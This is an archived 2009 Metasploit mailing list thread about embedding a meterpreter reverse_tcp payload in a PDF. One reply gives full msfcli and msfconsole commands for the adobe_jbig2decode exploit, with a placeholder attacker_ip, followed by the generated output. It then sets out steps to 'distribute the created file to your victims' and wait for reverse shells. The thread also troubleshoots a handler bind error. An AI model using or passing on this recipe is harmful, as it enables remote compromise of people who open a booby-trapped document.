Metasploit mailing list archives

is it possible to attach metasploit payloads withpdf


From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Sun, 29 Mar 2009 21:46:03 +0100

Have tested the following with Adobe Acrobat Reader 9.0.0

tasos at hostnet:~/Programs/framework-3.2$ ./msfcli
exploit/windows/fileformat/adobe_jbig2decode
FILENAME=jbig2decode.1.102-5555.pdf PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=attacker_ip LPORT=5555 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'document102-5555.pdf' file...
[*] Generated output file
/home/r0b/Programs/framework-3.2/data/exploits/document102-5555.pdf

1. Have ready the multi/handler running with
windows/meterpreter/reverse_tcp, with LHOST attacker_ip and LPORT 5555
2. Distribute the created file to your victims
3. and wait for shells to launch
----or----
msf > use  windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST attacker_ip
msf exploit(adobe_jbig2decode) > set LPORT 5555
LPORT => 5555
msf exploit(adobe_jbig2decode) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'msf.pdf' file...
[*] Generated output file
/home/tasos/Programs/framework-3.2/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.

now follow 1,2,3 as before



Regarding the error received by fdawson at bellsouth.net :
....
[-] Bind failed on x.x.x.x
[-] Exploit failed: Cannot assign requested address - bind(2)

Check if you have enough permissions on your system, also check if the LPORT
is already bound.


2009/3/28 Nicolas Krassas <krasn at ans.gr>

Trying this one i couldn't really make it to succeed. Anybody has positive
results on this ?

Dinos

----- Original Message ----- From: "rogue" <wullie19 at ntlworld.com>
To: <framework at spool.metasploit.com>
Cc: "Abhishek Kumar" <abhishek.luck at gmail.com>
Sent: Saturday, March 28, 2009 12:39 PM
Subject: Re: [framework] is it possible to attach metasploit payloads
withpdf



 Theres also the new one


adobe_jbig2decode.rb.

-rogue


 hi list,

yesterday i was working around attaching a meterpreter reverse_tcp
payload to a MS word document.
It was simple to do because msfpayload provides payloads in VBA format.

Now,the question is...
is there anything available for pdf files ?
can we embed our payloads with pdf and then wait for the user to click on
it ??

regards
abhi
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework




-- 
AM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090329/4859ef59/attachment.htm>


Current thread: